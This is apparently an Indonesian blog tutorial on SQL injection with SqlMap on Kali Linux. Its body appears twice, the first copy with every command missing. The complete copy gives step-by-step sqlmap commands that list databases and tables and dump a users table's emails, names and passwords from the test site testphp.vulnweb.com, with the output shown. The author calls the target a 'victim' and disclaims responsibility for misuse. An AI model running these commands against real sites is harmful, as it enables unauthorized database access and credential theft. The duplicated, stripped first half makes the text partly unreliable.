pagi bro, pada kesempatan hari ini saya akan membagikan tutorial scaning website dengan menggunakan SqlMap di Kali Linux 2.0 .
langsung saja bro, tanpa basa-basi.
pertama anda siapkan korban dahulu, setelah siap mari ikuti langkah-langkah berikut ini :
buka terminal anda, setelah terbuka ketikkan perintah
untuk melakukan perintah hacking masukkan perintah
contoh :
NOTE : JIKA MUNCUL PESAN-PESAN SILAHKAN TEKAN 'y'
di sini saya mendapatkan 2 data base
setelah itu lanjutkan lagi untuk melihat database . ketikkan perintah
contoh
disini saya menemukan 8 tables acuart
setelah itu ketikkan perintah
contoh
hasil scan saya mendapatkan database berikut
setelah itu ketikkan perintah
contoh
dan inilah hasil scan saya
dan pasword adalah tes. email adalah email@email.com ?? oke, tetapi dalam pentesting web sendiri, anda bisa data lebih sensitif.
mungkin ini kurang jelas tetang hasil saya, anda bisa kembangkan sendiri site anda. ini hanya contoh belaka.
sekian dari saya, semoga bermanfaat.
Terimakasih.
NOTE : SAYA TIDAK BERTANGGUNA JAWAB ATAS APA YANG DI LAKUKAN OLEH USER
langsung saja bro, tanpa basa-basi.
pertama anda siapkan korban dahulu, setelah siap mari ikuti langkah-langkah berikut ini :
buka terminal anda, setelah terbuka ketikkan perintah
sqlmap -h
untuk melakukan perintah hacking masukkan perintah
sqlmap -u (www.target.com) --dbs
contoh :
sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 --dbs
NOTE : JIKA MUNCUL PESAN-PESAN SILAHKAN TEKAN 'y'
di sini saya mendapatkan 2 data base
*) acuart
*) information_schema
setelah itu lanjutkan lagi untuk melihat database . ketikkan perintah
sqlmap -u (www.target.com) -D database-target --tables
contoh
sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart --tables
disini saya menemukan 8 tables acuart
+-----------+
| artists |
| carts |
| categ |
| featured |
| guestbook |
| pictures |
| products |
| users |
+-----------+
setelah itu ketikkan perintah
sqlmap -u (www.target.com) -D database-target --columns
contoh
sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart --columns
hasil scan saya mendapatkan database berikut
setelah itu ketikkan perintah
sqlmap -u (www.target.com) -D (database target) -T (admin) --dump
contoh
sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart -T users -C email,name,pass --dump
dan inilah hasil scan saya
dan pasword adalah tes. email adalah email@email.com ?? oke, tetapi dalam pentesting web sendiri, anda bisa data lebih sensitif.
mungkin ini kurang jelas tetang hasil saya, anda bisa kembangkan sendiri site anda. ini hanya contoh belaka.
sekian dari saya, semoga bermanfaat.
Terimakasih.
NOTE : SAYA TIDAK BERTANGGUNA JAWAB ATAS APA YANG DI LAKUKAN OLEH USER
PERINGATAN
Jika ingin membagikan artikel ini melalui blog anda, silakan tulis ulang dengan narasi sendiri.
Jangan asal copy paste artikel ini, semua konten di sini telah dilindungi
2 komentar
Write komentarMantab mas brow, trims atas infonya
ReplyIjin hack web lu
ReplyEmoticonEmoticon